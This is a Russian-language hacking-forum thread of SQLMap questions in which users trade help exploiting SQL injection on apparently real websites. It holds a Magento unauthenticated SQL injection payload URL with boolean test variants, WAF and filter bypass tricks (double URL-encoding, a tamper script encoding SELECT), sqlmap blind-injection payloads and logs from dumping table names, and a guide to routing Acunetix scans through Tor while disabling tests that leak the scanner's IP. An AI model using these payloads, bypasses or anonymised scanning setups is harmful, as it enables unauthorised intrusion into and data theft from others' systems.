Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    как обойти WAF/IPS identified as 'AWS WAF (Amazon)'

    Array
    (
    [0] => Array
    (
    [0] => 42000
    [SQLSTATE] => 42000
    [1] => 8114
    Code:
     => 8114
                [2] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int.
                [message] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int.
            )
    
    )
     
    #1081 brown, 26 Oct 2020
    Last edited: 26 Oct 2020
  2. Gigggs

    Gigggs New Member

    Joined:
    12 Jan 2017
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста , Акунетикс нашел вот такую уязвимость Magento (2.2.0 to 2.3.0) Unauthenticated SQL Injection Vulnerability
    нашел видос и пару статей как раскрутить
    вот к примеру
    но ничего не выходт

    вот как выглядит

    https:// site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3*3>8)+--+-

    или я что то не так делаю, может кто подскажет какие варианты еще есть или команды, или там вообще нет уязвимости
     
  3. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Гадать на кофейной гуще?
    Что вам говорит site/magento_version
    Что получаете в ответ когда шлёте
    Code:
    )))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1=1)+--+-
    и что получаете
    Code:
    )))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1=0)+--+-
    Первоисточник
     
    Eidolon, Svan and Baskin-Robbins like this.
  4. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Привет помогите!
    Через SQLmap в PostgreSQL создал --sql-shell как мне сохранить output запросов?
    SQLmap стандартным способом сохраняет но через --dump мне не выдает ничего только через sql-shell
     
  5. Gigggs

    Gigggs New Member

    Joined:
    12 Jan 2017
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    подскажите , че это такое?
    available databases [7]:
    [*] `\\xfc@\xdc\xff\xfbt\xb7?\xfd\xff\xff\xa0? "@<\x80\xff\xfe\xeb\xe3\xff/ \xc0\xd4\xa3`
    [*] ` \xff\xe7\xce?\xff\xf9\x89?\xfe\xe8?\xf1\xfe\x84\x9c\x87!р\xe8\xb2A\xff\x84$\xe46\x81`
    [*] `\xff\xfe~\x80\xff\xfe$\x8f\xfc\xff \xfd\xf\xfb\xd2?\xff\xff8\x8e@h\xe0\xa0\xf0{n\xbX\xf8!`
    [*] `>>@?\xf1W\x8f\xa0#\xff\x90@\xf2?\xfe\xe8\xff\xc8\xf9\xf9\xe4c\xfa;7:\xbc\x80\xeb\x83\xf`
    [*] `\xfc\xff\xc8\xf3\xfc\xa0\xe3\xe4\xd0?\xff\xc8\xff\x84>1\xe2\x909\xfc
    \xfe?\xca\xd8+\xf0V`
    [*] `\xfc \xc8\xfcD\x81▒\xff\xe8\xff\xf8\xff \x85 \xc4\xff\x9f\xfa\xf3\xf1NH\xe3\xe2\xb9 \xa2\xe1
    \x801\xfb\xa0`
    [*] `\xfc \xff\xff\xfa\xbf\xc8?\x8f ? ?\xff\xfa$8\xff\xfb?\xff\xe4\xff\xff\xfe1 \xff\xfc\xe1G\xf9^\xe0\xffq\xc1`
     
  6. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Насколько я понимаю, это звания баз данных в неправильной кодировке.
    Можете посмотреть используемую кодировку с помощью
    Code:
    SELECT SCHEMA_NAME 'database', default_character_set_name 'charset', DEFAULT_COLLATION_NAME 'collation' FROM information_schema.SCHEMATA;
     
    dzhim2014 and Eidolon like this.
  7. ex3x1

    ex3x1 New Member

    Joined:
    14 Sep 2019
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Приветствую. Русские слова/буквы дампятся из БД в таком виде: вапми

    Английские слова и буквы при этом в нормальном виде. Кто то может подсказать как сдампить данные на русском языке в нормальном виде?
     
  8. newvol

    newvol New Member

    Joined:
    9 May 2015
    Messages:
    23
    Likes Received:
    3
    Reputations:
    0
    Добрый день

    куда копать дальше?

    <font color='red'><b>������ ���������� ������� SELECT * FROM `m_services` WHERE pay = ''' AND id_device='0' AND type!='provider' AND active='1' ORDER BY id</b></font><br /><div class='end_section'>
     
  9. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    как из boolean-based blind (false positive) сделать union, указать количество колонок (--union-cols=) в current bd или во всех БД?
     
  10. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Что-то мне не понятна суть вопроса, во первых "false positive" вроде как говорит о том что там вовсе и нету скули? К тому же даже если у вас и есть скуля, то она же слепая (boolean-based blind) и что тогда вам даст данные из других таблиц через UNION?
     
    Eidolon and Suicide like this.
  11. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    я имею в виду как мапу помочь крутануть вектор юнион?
    target URL appears to have 47 columns in query
     
  12. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    --technique=U
     
  13. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    подскажите что написать в коде темпера для того чтоб он при запросах менял select на %53%45%4c%45%43%54
    я попробовал сделать вот так:

    Code:
    #!/usr/bin/env python
    
    """
    Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
    See the file 'LICENSE' for copying permission
    """
    
    import os
    import re
    
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.HIGHEST
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
        """
        Reference:
    
        Notes:
            Examples:
        """
    
        retVal = payload
    
        if payload:
            retVal = re.sub(r"\s*SELECT\s*", " %53%45%4c%45%43%54 ", retVal)
    
        return retVal
    
    но при запуске он мне пишет [CRITICAL] missing function 'tamper(payload, **kwargs)' in tamper script
    помогите плиз
     
  14. Gigggs

    Gigggs New Member

    Joined:
    12 Jan 2017
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    пипл сори что не по теме , не могу найти нужную.. и я и много людей тут спрашивали по поводу уязвимостей сканом из Acunetix . Пожалуйста подскажите как через прокси пустить скан , ну что бы не банило ип при скане и не зависал скан, я имею в виду в веб. Извиняюсь еще раз что не в этой теме , подскажите пожалуйста.
     
  15. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    кто нибудь знает как можно обойти фильтры на ()?
    it appears that some non-alphanumeric characters (i.e. ()) are filtered by the back-end server.
     
  16. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Да вроде работает ваш скрипт, скопипастил, запустил и выполняется без ошибок, может у вас где-то таб вместо пробела?
    Может быть двойная кодировка поможет '(' -> %28 -> %25%32%38
    Если идёт сначала фильтр, то попробовать '%2(8' тогда после фильтра '(' останется '%28' -> '('
     
  17. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    Спасибо, попробовал, но к сожалению не помогло. Может быть есть еще какие то варианты?
     
  18. dzhim2014

    dzhim2014 New Member

    Joined:
    18 Oct 2013
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А как быть когда dbms = INFORMIX ?
    [​IMG]
    https://prnt.sc/w9vw7e
    2. Какие на сегодня существуют методы обхода AKAMAI ?
    ПЫСЫ: fandor9 , случаем платных консультаций не оказываете?
     
  19. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Приветствую, если версия 12 и 13 (в 10 он просто в настройках включается GUI ) то вот выдержка из моего мануала

    1)Если нужна работа через тор
    качаем privoxy_3.0.28
    правим конфиг
    forward-socks5t / 127.0.0.1:9150 .
    forward-socks4 / 127.0.0.1:9150 .
    forward-socks4a / 127.0.0.1:9150 .

    12)C:\ProgramData\Acunetix\shared\general в файле settings.xml ищем слово proxy
    и меняем на 127.0.0.1 порт 8118
    13)Необязательный пункт!!! Теперь при скане сайта дополнительно в веб интерфейсе для каждого скана идем в вкладку HTTP и прописываем 127.0.0.1 порт 8118 (этот пункт оказался не обязательным ,если настройки прописаны в settings.xml)
    Проверить работу можно отключив тор- сайт не будет сканится.

    ========================
    чтобы не было утечки айпи при работе через тор нужно отключить следующие тесты ,которые используют порты в обход тор
    Server tests:
    Apache Tomcat AJP protocol audit
    JMX and RMI
    Java Debug Wire Protocol (JDWP) audit
    Open SSL TLS Heartbleed
    PHP Hash Collision DOS
    TLS/SSL audit

    Target Tests:
    Apache Cassandra
    FastGI Unauthorized Access
    Memcached
    Oracle Weblogic T3 XXE
    Redis Unath
    webLogic RCE
    Apache Log4j socket
    uWSGI

    UPD по поводу зависания веб. Веб вообще не участвует в скане ,это просто оболочка для wvsc.exe его (WEB-GUI) можно даже закрыть, и все равно сканы будут идти. Чтобы зависаний не было ,не ставьте на сайт макимум потоков , лучше 2 деление слева при начале скана. И комп на ссд + минимально 6 Гб оперы + обязательно не использовать дефолт профиль скана ,где включены тесты ДДос, если у вас цель стоит поиск ошибок ,а не положить сайт.
     
    _________________________
    Gigggs likes this.
  20. Gigggs

    Gigggs New Member

    Joined:
    12 Jan 2017
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста в чем может быть проблема..
    retrieving таблиц с начало норм шло

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Parameter: sort_by (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)



    5:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: ai_tracking_visits_today
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: 10
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: ai_widgets
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: 19
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: ai_widgets_comments
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: 9
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: b?ppd?pp?
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: b?ppd?pp?
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] resumed: b?ppd?pp?
    [15:06:37] [DEBUG] performed 0 queries in 0.00 seconds
    [15:06:37] [INFO] retrieving the length of query output
    [15:06:37] [INFO] resumed: b?ppd?pp?

    А потом вот такая вот хрень пошла resumed: b?ppd?pp?
    [15:11:36] [PAYLOAD] (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x687564736f6e61745f6169 LIMIT 62,1),10,1))>57) THEN 0x6966286e6f7728293d7379736461746528292c736c6565702830292c3029 ELSE (SELECT 8755 UNION SELECT 5075) END))
    [15:11:38] [INFO] retrieved: b?ppd?pp?

    Заранее спасибо.